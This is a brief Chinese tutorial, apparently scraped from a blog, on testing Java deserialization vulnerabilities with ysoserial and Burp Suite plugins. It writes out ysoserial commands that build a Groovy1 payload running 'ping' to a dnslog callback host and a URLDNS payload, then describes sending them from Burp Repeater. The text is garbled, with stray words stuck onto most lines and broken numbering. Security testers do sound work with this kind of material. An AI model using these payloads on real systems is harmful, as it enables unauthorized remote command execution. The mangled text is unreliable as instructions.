1.生成測試payload:
cd D:\plug_in\BurpSuite JAVA反序列化漏洞掃描插件java
//下面的語句意思就是反連到你自已的dnslog平臺:git
java -jar ./ysoserial-0.0.5.jar Groovy1 "ping t00ls.321c7f33a1e05e08674e86fae641e95c.tu4.org" > payload1.txtgithub
java -jar ./ysoserial-0.0.6-SNAPSHOT-BETA-all.jar URLDNS http://t00ls.321c7f33a1e05e08674e86fae641e95c.tu4.org/ > payload1.txt測試
2.在burpsuite中載入paload1.txt:ui
Repeater->右鍵選「Paste from file"url
//dnslog平臺上面看結果:spa
3.burpsuite反序列化插件的測試截圖:.net
下載地址:https://github.com/federicodotta/Java-Deserialization-Scanner/插件
四、burpsuite JavaSerialKiller插件測試java反序列化漏洞:
ping t00ls.321c7f33a1e05e08674e86fae641e95c.tu4.org blog